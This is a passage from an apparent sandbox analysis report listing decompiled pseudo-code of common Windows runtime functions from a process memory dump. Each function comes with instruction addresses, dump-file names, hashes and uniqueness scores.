					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04BA95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E04BA95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04BA95D0();
				return L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x04bfc458
0x04bfc45d
0x04bfc466
0x04bfc468
0x04bfc469
0x04bfc46a
0x04bfc46b
0x04bfc46e
0x04bfc46f
0x04bfc471
0x04bfc476
0x04bfc476
0x04bfc47c
0x04bfc47e
0x04bfc480
0x04bfc480
0x04bfc483
0x04bfc484
0x04bfc486
0x04bfc488
0x04bfc48f
0x04bfc491
0x04bfc493
0x04bfc493
0x04bfc48f
0x04bfc498
0x04bfc49e
0x04bfc4ad
0x04bfc4ad
0x04bfc4b2
0x04bfc4b4
0x04bfc4cd

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 2f5a6a471f8b8b0593346255da4091a613a1ac5948f9a6e9cb6e3e891a96c46e
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: C901B5B6140609BFE721AF69CC80E62FB7DFF54798F104565F21442560CB31FCA4DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 04C34015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04C34015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04B82280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04B82280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4c586ac);
					E04B6F900(0x4c586d4, _t28);
					E04B7FFB0(0x4c586ac, _t28, 0x4c586ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04B7FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x04c3401a
0x04c3401e
0x04c34023
0x04c34028
0x04c34029
0x04c3402b
0x04c3402f
0x04c34043
0x04c34046
0x04c34051
0x04c34057
0x04c3405f
0x04c34062
0x04c34067
0x04c3406f
0x04c3407c
0x04c3407c
0x04c3408c
0x04c3408c
0x04c34097

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af927573e95090a028881f967ea4e0462c802b4434d8da17f308f4131f6fd484
Instruction ID: 17176ff2f3cdb295b2c6fee68c10f6828624addc358371c872653d26f302c8a6
Opcode Fuzzy Hash: af927573e95090a028881f967ea4e0462c802b4434d8da17f308f4131f6fd484
Instruction Fuzzy Hash: 6E018F72241945BFE715BF79CD80E27B7ACEB45668B0006A9F51887A21CF24FC51CAE8

Uniqueness

Uniqueness Score: -1.00%

Function 04C214FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E04C214FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4c5d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04BAFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04B87D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04c214fb
0x04c214fb
0x04c2150a
0x04c21514
0x04c21519
0x04c2151b
0x04c21526
0x04c2152c
0x04c21534
0x04c21537
0x04c2153a
0x04c21545
0x04c21557
0x04c21547
0x04c21550
0x04c21550
0x04c21562
0x04c21563
0x04c21565
0x04c2156a
0x04c2157f

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40b580f9c6388d381d2995e7af0e3d39753bcc0b96c6ac94acf7993867109d1
Instruction ID: b45f2b503c17c1bc3fb471f7f46c9413a32b18a5e985b31ed67ae3daec8e72a1
Opcode Fuzzy Hash: a40b580f9c6388d381d2995e7af0e3d39753bcc0b96c6ac94acf7993867109d1
Instruction Fuzzy Hash: A3019271A00258AFDB14DFA9D841EAEB7B8EF44714F0440A6F915EB280DA74EA51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04C2138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E04C2138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4c5d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04BAFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04B87D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x04c2138a
0x04c2138a
0x04c21399
0x04c213a3
0x04c213a8
0x04c213aa
0x04c213b5
0x04c213bb
0x04c213c3
0x04c213c6
0x04c213c9
0x04c213d4
0x04c213e6
0x04c213d6
0x04c213df
0x04c213df
0x04c213f1
0x04c213f2
0x04c213f4
0x04c213f9
0x04c2140e

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afe931788c8d58a2b33d84ae13779601a68de5c43000e222497beae8997b774
Instruction ID: 43aa812806d430741a8cf07b7cf68249e97acda86fbbb8f8774a81d67aa5dc10
Opcode Fuzzy Hash: 2afe931788c8d58a2b33d84ae13779601a68de5c43000e222497beae8997b774
Instruction Fuzzy Hash: 8A019271A04318AFDB14DFA9D941FAEB7B8EF44710F044096F900EB280DA74EA51C790

Uniqueness

Uniqueness Score: -1.00%

Function 04B658EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E04B658EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4c5d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4b45c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04B65943() != 0 &&  *0x4c55320 > 5) {
					E04BE7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04BE7B5E( &_v28, _t28);
					_t11 = E04BE7B9C(0x4c55320, 0x4b4bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E04BAB640(_t11, _t17, _v8 ^ _t29, 0x4b4bf15, _t27, _t28);
			}

0x04b658fb
0x04b658fe
0x04b65906
0x04b6590a
0x04b6593c
0x04b6593c
0x04b6590c
0x04b6590c
0x04b65911
0x00000000
0x04b65913
0x04b65913
0x04b65913
0x04b65911
0x04b6591d
0x04bc1035
0x04bc103c
0x04bc103f
0x04bc1056
0x04bc1056
0x04b6593b

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15bd76fe17b25c993ebd8ea925186a38b6ffd3bfa3f982b190bbc767ffafe8a7
Instruction ID: 7244a5ecbd36fb35f1f26fae567b68947095b4c2bc34044903d6058dd24c4831
Opcode Fuzzy Hash: 15bd76fe17b25c993ebd8ea925186a38b6ffd3bfa3f982b190bbc767ffafe8a7
Instruction Fuzzy Hash: 7201A732B10518BBE724DE39E8109BE77ADEF84234F9400E99906A7284DE34FD11C654

Uniqueness

Uniqueness Score: -1.00%

Function 04B7B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B7B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04B87D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04BE7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x04b7b037
0x04b7b039
0x04b7b03b
0x04b7b040
0x04bca60e
0x00000000
0x00000000
0x04bca61d
0x04b7b04b
0x04b7b04e
0x04bca627
0x04bca634
0x00000000
0x00000000
0x04bca641
0x04bca653
0x04bca643
0x04bca64c
0x04bca64c
0x04bca65b
0x00000000
0x00000000
0x00000000
0x04bca66c
0x04b7b057
0x04b7b057
0x04b7b057
0x04b7b046
0x04b7b046
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 7197bd245da38f8c5e30c369553390e02abe4406fda87a6757ccaaf0883c17b3
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: E5017C722049849FD326CB6DC988F6677D8EF45758F0900E5F929CBA51EA28FC40CA20

Uniqueness

Uniqueness Score: -1.00%

Function 04C31074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04C31074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E04C3165E(__ebx, 0x4c58ae4, (__edx -  *0x4c58b04 >> 0x14) + (__edx -  *0x4c58b04 >> 0x14), __edi, __ecx, (__edx -  *0x4c58b04 >> 0x14) + (__edx -  *0x4c58b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E04C2AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04B87D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E04C1FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x04c31074
0x04c31080
0x04c31082
0x04c3108a
0x04c3108f
0x04c31093
0x04c310ab
0x04c310ab
0x04c310c3
0x04c310cf
0x04c310e1
0x04c310d1
0x04c310da
0x04c310da
0x04c310e9
0x04c310f5
0x04c310f5
0x04c310fe

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e461c04b4dacd74479410d1136f3de750242ee4aa36331dd0e3ce2c96ecef6e
Instruction ID: 949d95f611f2377e61f04dd9526ffec7bd61608d9300ba017988261c1972ea88
Opcode Fuzzy Hash: 0e461c04b4dacd74479410d1136f3de750242ee4aa36331dd0e3ce2c96ecef6e
Instruction Fuzzy Hash: 2A0124726047419FD710EF68C940B1AB7EAAB84319F08C629F88593290EE74F950DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04C1FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04C1FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4c5d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04BAFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04B87D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04c1fec0
0x04c1fec0
0x04c1fecf
0x04c1fed9
0x04c1fede
0x04c1fee0
0x04c1feeb
0x04c1fef3
0x04c1fef6
0x04c1fef9
0x04c1ff04
0x04c1ff16
0x04c1ff06
0x04c1ff0f
0x04c1ff0f
0x04c1ff21
0x04c1ff22
0x04c1ff24
0x04c1ff29
0x04c1ff3e

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57cfae055715851aab6b368138ba9f2f599ebdc4bba8851a15fe27365c7c1c9b
Instruction ID: ad1180a1640f40869cfeee665b480ff91af162322ace86bd51432a8e1fb8ef6f
Opcode Fuzzy Hash: 57cfae055715851aab6b368138ba9f2f599ebdc4bba8851a15fe27365c7c1c9b
Instruction Fuzzy Hash: C901D471E04208ABDB14DFA9D845FAEB7B8EF45704F0440AAF900AB290EA74EA11C794

Uniqueness

Uniqueness Score: -1.00%

Function 04C1FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04C1FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4c5d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04BAFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04B87D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04c1fe3f
0x04c1fe3f
0x04c1fe4e
0x04c1fe58
0x04c1fe5d
0x04c1fe5f
0x04c1fe6a
0x04c1fe72
0x04c1fe75
0x04c1fe78
0x04c1fe83
0x04c1fe95
0x04c1fe85
0x04c1fe8e
0x04c1fe8e
0x04c1fea0
0x04c1fea1
0x04c1fea3
0x04c1fea8
0x04c1febd

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f34b1b1ea6925202a01e71693b6b46f6c2076d4d467a764663c43250853684b
Instruction ID: e5d53990f1af5773bcb15e89fb6294befffe6971d0d5d87807e52c359c0a5b2a
Opcode Fuzzy Hash: 5f34b1b1ea6925202a01e71693b6b46f6c2076d4d467a764663c43250853684b
Instruction Fuzzy Hash: 8B018471E04218ABDB14DFA9D845FAEB7B8EF44714F0440AAF900AB291DA74EA51C794

Uniqueness

Uniqueness Score: -1.00%

Function 04C38ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04C38ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x4c5d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04B87D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x04c38ed6
0x04c38ee5
0x04c38eed
0x04c38ef0
0x04c38efa
0x04c38f03
0x04c38f0c
0x04c38f15
0x04c38f24
0x04c38f27
0x04c38f31
0x04c38f43
0x04c38f33
0x04c38f3c
0x04c38f3c
0x04c38f4e
0x04c38f4f
0x04c38f51
0x04c38f56
0x04c38f69

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a403d1523d6cf1bbd497c364e822212752dfdcee8c2366758c9f3c0d92f5ea0
Instruction ID: e159a0cc98346a1cc21326ec61cae6f3285e91e5461b0eb009ff92f3b189048d
Opcode Fuzzy Hash: 9a403d1523d6cf1bbd497c364e822212752dfdcee8c2366758c9f3c0d92f5ea0
Instruction Fuzzy Hash: E4110C70A042199FDB04DFA9D541BAEB7F4FB08304F1442AAE519EB381E634A940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04C38A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04C38A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x4c5d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E04B87D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04BAB640(E04BA9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04c38a62
0x04c38a71
0x04c38a79
0x04c38a82
0x04c38a85
0x04c38a89
0x04c38a8c
0x04c38a8f
0x04c38a92
0x04c38a95
0x04c38a9f
0x04c38ab1
0x04c38aa1
0x04c38aaa
0x04c38aaa
0x04c38abc
0x04c38abd
0x04c38abf
0x04c38ac4
0x04c38ada

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7524dff8243d161c6fcb5200570e3b199babe6784b87542ec617da6db823b0c1
Instruction ID: 0a292821a303134d99855a26a2f8b96a801efdbe6643897c64311c9f38a30b8c
Opcode Fuzzy Hash: 7524dff8243d161c6fcb5200570e3b199babe6784b87542ec617da6db823b0c1
Instruction Fuzzy Hash: D70121B1A0421C9FDB04DFA9D9419AEB7F8EF48714F14409AF905F7341DA34A911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04B6DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B6DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E04B6DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E04B6E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L04B6E8B0(__ecx, _t14, 0xfff);
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x04b6db64
0x04b6db66
0x04b6db6b
0x04b6dbaa
0x04b6db71
0x04b6db76
0x04b6db7a
0x04b6dba3
0x04b6db7c
0x04b6db87
0x04b6db8b
0x04bc4fa1
0x04bc4fb3
0x04bc4fb8
0x04b6db91
0x04b6db96
0x04b6db98
0x04b6db98
0x04b6db8b
0x04b6db7a
0x04b6db9d
0x04b6dba2

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 808ef1a160c91f8d6aadde0bd1f3025ac38bdb4fd7b6b993a48b3144f60a0738
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: ECF0C8333015229BE7726A554880F27B69DCF92A64F1D00B5B2069B248D968A80297D0

Uniqueness

Uniqueness Score: -1.00%

Function 04B6B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04B6B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E04B87D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E04B87D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04BE7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x04b6b1e8
0x04b6b1ea
0x04b6b1f3
0x04bc4a17
0x04b6b1f9
0x04b6b1f9
0x04b6b1f9
0x04b6b201
0x04bc4a21
0x04bc4a2e
0x00000000
0x00000000
0x04bc4a3b
0x04bc4a4d
0x04bc4a3d
0x04bc4a46
0x04bc4a46
0x04bc4a55
0x00000000
0x00000000
0x00000000
0x04b6b20a
0x04b6b20a
0x04b6b20a
0x04b6b20a

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 3a385a7221b22f1436fc6cadbdfac829db8754c33a8251d11cc619e98b475250
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 9601F932304580DBD7229B5DC844F697BE8EF41754F0800E5F915CB6B1EA78F901D714

Uniqueness

Uniqueness Score: -1.00%

Function 04BFFE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04BFFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x4c5d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
